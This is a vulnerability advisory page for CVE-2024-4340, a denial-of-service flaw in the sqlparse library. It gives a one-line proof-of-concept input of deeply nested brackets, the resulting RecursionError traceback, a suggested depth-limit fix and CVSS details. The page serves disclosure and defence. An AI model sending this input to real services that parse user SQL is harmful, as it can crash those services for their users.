🛡️ CVE-2024-4340 — sqlparse

🟠 CVSS 8.0 — High ✅ No Known Exploit CWE-674 NVD
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

sqlparse parsing heavily nested list leads to Denial of Service

Summary

Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.

Details + PoC

Running the following code will raise Maximum recursion limit exceeded exception:

```py

import sqlparse

sqlparse.parse('[' * 10000 + ']' * 10000)

```

We expect a traceback of RecursionError:

```py

Traceback (most recent call last):

File "trigger_sqlparse_nested_list.py", line 3, in <module>

sqlparse.parse('[' * 10000 + ']' * 10000)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/__init__.py", line 30, in parse

return tuple(parsestream(sql, encoding))

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/filter_stack.py", line 36, in run

stmt = grouping.group(stmt)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py", line 428, in group

func(stmt)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py", line 53, in group_brackets

_group_matching(tlist, sql.SquareBrackets)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py", line 48, in _group_matching

tlist.group_tokens(cls, open_idx, close_idx)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 328, in group_tokens

grp = grp_cls(subtokens)

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 161, in __init__

super().__init__(None, str(self))

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 165, in __str__

return ''.join(token.value for token in self.flatten())

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 165, in <genexpr>

return ''.join(token.value for token in self.flatten())

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 214, in flatten

yield from token.flatten()

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 214, in flatten

yield from token.flatten()

File "/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py", line 214, in flatten

yield from token.flatten()

[Previous line repeated 983 more times]

RecursionError: maximum recursion depth exceeded

```

Fix suggestion

The [flatten()](https://github.com/andialbrecht/sqlparse/blob/master/sqlparse/sql.py#L207) function of TokenList class should limit the recursion to a maximal depth:

```py

from sqlparse.exceptions import SQLParseError

MAX_DEPTH = 100

def flatten(self, depth=1):

"""Generator yielding ungrouped tokens.

This method is recursively called for all child tokens.

"""

if depth >= MAX_DEPTH:

raise SQLParseError('Maximal depth reached')

for token in self.tokens:

if token.is_group:

yield from token.flatten(depth + 1)

else:

yield token

```

Impact

Denial of Service (the impact depends on the use).

Anyone parsing a user input with sqlparse.parse() is affected.

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

Weakness class

CVE-2024-4340 is classified as CWE-674: Uncontrolled Recursion. The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

Affected software

CVE-2024-4340 is recorded against 2 packages.

  • sqlparse (fixed in 0.5.0)
  • unknown

Timeline and source

Published on 15 April 2024 and last revised on 8 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
research.jfrog.com (Web)

CVE-2024-4340 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE CWE-674
Public Exploit ✅ No
Source NVD
Published 2024-04-15
Updated 2026-08-12
Modified 2026-07-08
Fix URL N/A

Affected Packages

Software From version Fixed in
sqlparse 0.5.0
unknown

Site Security Check

Is sqlparse part of your stack?

CVE-2024-4340 is rated CVSS 8.0 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2024